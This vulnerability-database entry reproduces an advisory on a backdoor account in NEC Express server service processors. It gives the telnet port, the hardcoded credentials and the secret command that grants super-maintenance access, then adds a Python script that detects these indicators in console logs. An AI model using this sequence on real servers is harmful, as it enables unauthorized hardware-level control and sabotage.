NEC Backdoor Administrative Account

Vulnerability ID 1047466 Vulnerability type
Published 2012-05-13 Updated 2012-05-13
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2012050101
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit
   Hi!

   NEC Corp. has a product line of high performance servers
   - http://www.nec.com.sg/index.php?q=products/enterprise-servers

   The documentation says that there are two user privilege
   levels:

   1. Common user - who can monitor the system status

   2. Admin user - for configuring system hardware

   But there is another, very high privilege user, who can manipulate
   memory and produce hardware failure.


   POC

   Connect to the service processor of the NEC Express server with the
   telnet client on port 5001:


   Integrated Service Processor.

   Cabinet-ID:xx, Location:y, State:ssssss

   iSP login: spfw<ENTER>

   iSP password: nec<ENTER>

   Copyright (C) 2005 NEC Corporation, All Rights Reserved.

   Welcome to Integrated Service Processor.

   iSP FW version : 01.00 generated on 01/01/2005 19:20:33

   iSP MAIN MENU

       0) OS(BIOS) serial console of partition#0 (INITIALIZING )

       1) OS(BIOS) serial console of partition#1 (RUNNING      )

       V) Virtual System Operator Panel

       S) iSP commands

       E) Exit

       DISCONNECTALL) disconnect all console connections

   iSPyz> s<ENTER>


   Go to maintenance mode with the command "cm" (default password: mainte).

   Now, in command mode, enter the following (with the period at the end):


   iSP0m:MNT> nec=topvendor.

   ??? : good-bye.

   Command mode was changed to super-maintenance mode.

   BE CAREFUL to use each command.

   iSP0m:@@@>


   You now have super admin rights at the hardware level of the
   supercomputer!


   That's it.....
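
For defenders, the session above contains three strings worth alerting on in recorded service-processor console sessions: the `spfw` login, the super-maintenance banner, and the `@@@>` prompt. The Python below is an added example, not part of the original advisory; it assumes sessions are logged as plain text (for example by a console server), and `scan_transcript` and the sample transcripts are constructed for illustration.

```python
import re

# Indicator strings below are copied from the session shown in the advisory.
LOGIN_RE = re.compile(r"^\s*iSP login:\s*(\S+?)(?:<ENTER>)?\s*$")
PROMPT_RE = re.compile(r"^\s*iSP\w*:(MNT|@@@)>")
SUPER_BANNER = "Command mode was changed to super-maintenance mode."
FLAGGED_LOGINS = {"spfw"}  # login name used in the advisory


def scan_transcript(text):
    """Return [(line_no, kind)] findings for one recorded iSP console session."""
    findings = []
    in_super = False
    for no, line in enumerate(text.splitlines(), 1):
        login = LOGIN_RE.match(line)
        if login:
            in_super = False  # a new login starts a new session
            if login.group(1) in FLAGGED_LOGINS:
                findings.append((no, "flagged-login"))
            continue
        if SUPER_BANNER in line:
            if not in_super:
                findings.append((no, "super-maintenance-banner"))
            in_super = True
            continue
        prompt = PROMPT_RE.match(line)
        if prompt:
            if prompt.group(1) == "@@@" and not in_super:
                # Banner line missing (truncated capture): the prompt alone is enough.
                findings.append((no, "super-maintenance-prompt"))
            in_super = prompt.group(1) == "@@@"
    return findings


# Constructed sample transcripts (not captured from a real system).
SAMPLE_FULL = """\
iSP login: spfw
iSP password:
Welcome to Integrated Service Processor.
iSP0m:MNT> [command redacted]
Command mode was changed to super-maintenance mode.
BE CAREFUL to use each command.
iSP0m:@@@>
"""
SAMPLE_TRUNCATED = "iSP0m:@@@> \niSP0m:@@@> \n"
SAMPLE_BENIGN = "iSP login: operator1\niSP password:\niSP MAIN MENU\n"

if __name__ == "__main__":
    for name in ("SAMPLE_FULL", "SAMPLE_TRUNCATED", "SAMPLE_BENIGN"):
        print(name, scan_transcript(globals()[name]))
```

Each mode change is reported once per session, so a long super-maintenance session does not flood the alert queue with one finding per prompt line.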